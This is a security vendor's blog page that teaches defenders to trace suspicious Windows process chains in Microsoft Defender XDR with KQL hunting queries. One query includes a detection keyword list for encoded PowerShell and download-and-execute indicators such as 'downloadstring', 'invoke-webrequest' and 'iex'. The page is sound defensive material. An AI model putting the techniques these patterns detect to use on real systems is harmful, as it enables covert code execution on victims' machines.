ACSC Logo
© 2026 GEMXIT
GEMXIT Logo
Agent Foskett • Microsoft Defender XDR • DeviceProcessEvents

The Process Tree Told The Real Story

The antivirus alert never triggered. The file looked legitimate. Signed by Microsoft. No malware verdict. No obvious warning.

``` But one process launched another. Then another. Then PowerShell spawned silently in the background.

The dashboard looked quiet. The process tree told the real story.

This Agent Foskett investigation explores how defenders use Microsoft Defender XDR, DeviceProcessEvents and KQL to follow parent and child processes, uncover suspicious execution chains and investigate what really happened on an endpoint. ```

Discuss endpoint investigations Back to Investigation Hub
Agent Foskett investigates a suspicious process tree in Microsoft Defender XDR
Briefing summary

A single process can look harmless. The real story appears when defenders follow what launched it, what it launched next and whether the execution chain matches normal user behaviour.

Follow parent and child processes
Hunt suspicious LOLBin chains
Use DeviceProcessEvents with KQL
🚨 One process rarely tells the whole story.
Attackers often hide inside legitimate Windows processes. The process tree shows whether trusted tools were used in an untrusted way.
Book a security review →

Why process trees matter in Microsoft Defender XDR

Endpoint investigations are not just about whether a file is malicious. A process tree helps defenders understand execution flow: what started first, what launched next and whether a normal-looking process became part of something suspicious.
The parent process gives contextPowerShell launched from an administrator console is different from PowerShell launched by Word, Outlook, Teams, mshta or a browser process.
The child process shows intentA trusted process becomes suspicious when it spawns scripting engines, downloads content, executes encoded commands or reaches out to unknown infrastructure.
The chain reveals behaviourThe real signal often comes from the sequence, not the individual process. One weak signal becomes stronger when the chain is viewed together.

First hunt: suspicious process chains

Start by looking for processes commonly abused during attacks. The goal is not to declare every command malicious. The goal is to find execution chains that deserve investigation.
suspicious-process-chains.kql
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
  8. 8
  9. 9
  10. 10
  11. 11
  12. 12
  13. 13
  14. 14
  15. 15
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe")
| project Timestamp,
          DeviceName,
          AccountName,
          FileName,
          ProcessCommandLine,
          InitiatingProcessFileName,
          InitiatingProcessCommandLine,
          InitiatingProcessParentFileName
| order by Timestamp desc
What to reviewLook for unusual parent processes, suspicious command lines, unexpected users, odd devices and process chains that do not match normal business activity.
Why it mattersLegitimate tools are often abused because they already exist inside Windows and may not trigger a simple malware verdict.
Best next pivotPivot into network events, file events, registry changes and sign-in activity to see whether the process chain was part of a wider compromise.

Second hunt: encoded PowerShell and command-line indicators

Encoded commands, execution bypasses and download behaviour can be legitimate in rare cases, but they deserve attention when launched from unusual parents or user-facing applications.
encoded-powershell-review.kql
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
  8. 8
  9. 9
  10. 10
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe")
| where ProcessCommandLine has_any ("-enc", "encodedcommand", "bypass", "downloadstring", "invoke-webrequest", "iex")
| project Timestamp, DeviceName, AccountName,
          FileName, ProcessCommandLine,
          InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc

When legitimate Microsoft-signed processes become suspicious

A signed Microsoft binary is not automatically safe in every context. Attackers often use trusted Windows tools because they blend into normal administration and may bypass simple allow/block thinking.
rundll32 can be abusedrundll32.exe is legitimate, but suspicious when it launches strange DLL paths, remote content, unusual scripts or unknown parent-child combinations.
Office apps can start the chainWord, Excel, Outlook or Teams spawning scripting tools is a very different story from normal document editing or collaboration.
Browsers can be involvedA browser download followed by script execution, archive extraction and suspicious process spawning can reveal the path from user action to endpoint execution.

Third hunt: Office or browser spawning scripting tools

This query looks for user-facing applications that launch scripting engines or command shells. These events should be reviewed carefully because they can show the bridge between phishing, downloads and endpoint execution.
office-browser-to-script-chain.kql
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
  8. 8
  9. 9
  10. 10
  11. 11
DeviceProcessEvents
| where Timestamp > ago(14d)
| where InitiatingProcessFileName in~ ("winword.exe", "excel.exe", "outlook.exe", "teams.exe", "chrome.exe", "msedge.exe")
| where FileName in~ ("powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe", "rundll32.exe")
| project Timestamp, DeviceName, AccountName,
          InitiatingProcessFileName, FileName,
          ProcessCommandLine, InitiatingProcessCommandLine
| order by Timestamp desc

Fourth hunt: build a simple endpoint timeline

Once you find a suspicious process, build a timeline around the device and account. This helps show whether the process was isolated noise or part of a wider chain of execution.
device-process-timeline.kql
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
  8. 8
  9. 9
  10. 10
  11. 11
  12. 12
DeviceProcessEvents
| where Timestamp between (datetime(2026-05-28T00:00:00Z) .. datetime(2026-05-28T23:59:59Z))
| where DeviceName == "DEVICE-NAME-HERE"
| project Timestamp,
          AccountName,
          FileName,
          ProcessCommandLine,
          InitiatingProcessFileName,
          InitiatingProcessCommandLine
| order by Timestamp asc

What the process tree can prove

The process tree does not just show that something ran. It can help explain how it started, which user context was involved, whether a document or browser event triggered it and what the endpoint did next.
Initial access cluesA suspicious parent may point back to phishing, a downloaded file, a malicious document, a browser session or a user action.
Execution behaviourThe chain can show whether the endpoint used PowerShell, cmd, mshta, rundll32 or other trusted tools in an unusual way.
Containment decisionsA clear process tree helps defenders decide whether to isolate a device, reset credentials, block indicators or escalate the incident.

The Agent Foskett investigator mindset

Do not stop at the file name. Do not stop at the signature. Do not stop at the first alert. Follow the behaviour until the story makes sense.
Ask what launched itEvery suspicious process needs context. Parent process, command line and user context often explain the risk better than the file name alone.
Follow what happened nextLook for child processes, network calls, dropped files, persistence attempts and account activity after the suspicious event.
Correlate the weak signalsOne event may look harmless. A chain of unusual events can tell a much stronger incident story.

How GEMXIT approaches endpoint investigations

GEMXIT helps organisations use Microsoft Defender XDR telemetry to move beyond simple alert review and into practical endpoint investigation workflows.
We review endpoint visibilityWe help check whether Defender telemetry is available, useful, retained and connected to the wider Microsoft security picture.
We build hunting logicWe help turn DeviceProcessEvents, DeviceNetworkEvents, DeviceFileEvents and identity telemetry into real investigation workflows.
We improve response readinessWe help teams understand what to isolate, what to reset, what to block and what evidence to preserve during an incident.
The file looked normal. The chain did not.
GEMXIT helps organisations investigate Microsoft Defender XDR endpoint telemetry, process trees, suspicious execution chains and KQL hunting workflows.
Contact GEMXIT

Final thought

A process name can lie.

A file signature can give false comfort.

A quiet dashboard can make everything feel fine.

But the chain remembers.

What launched first. What spawned next. Which user context was used. Which command line ran. Which tool reached out.

The process tree told the real story.
At GEMXITWe help organisations investigate Microsoft Defender XDR, Microsoft Sentinel, Entra ID, endpoint telemetry, process execution chains and real-world security operations workflows.
Agent Foskett mindsetThe question is not only: “Was the file malicious?”

It is: “What did the process tree reveal?”

Continue the investigation with The Process Was Signed By Microsoft, rundll32 Looked Legitimate, The PowerShell Never Triggered An Alert, Microsoft Defender KQL Threat Hunting Complete Guide, KQL Threat Hunting Guide, Cyber Security Has Moved Beyond Basic Antivirus, Microsoft Defender and the GEMXIT Security Review.

Develop IT. Protect IT.GEMXIT PTY LTD | GEMXIT UK LTD
ACSC Logo

GEMXIT PTY LTD  |  GEMXIT UK LTD  |  © GEMXIT 2026

The Process Tree Told The Real Story

This Agent Foskett investigation explains how Microsoft Defender XDR process trees, DeviceProcessEvents and KQL can reveal suspicious parent and child process behaviour that traditional antivirus alerts may not explain.

Microsoft Defender XDR process tree investigation

GEMXIT helps organisations investigate endpoint process chains, suspicious PowerShell activity, rundll32 behaviour, LOLBin execution, parent process context and Microsoft Defender Advanced Hunting telemetry.

DeviceProcessEvents and endpoint threat hunting

DeviceProcessEvents can help defenders understand process command lines, initiating processes, user context, device behaviour and execution timelines during Microsoft Defender XDR investigations.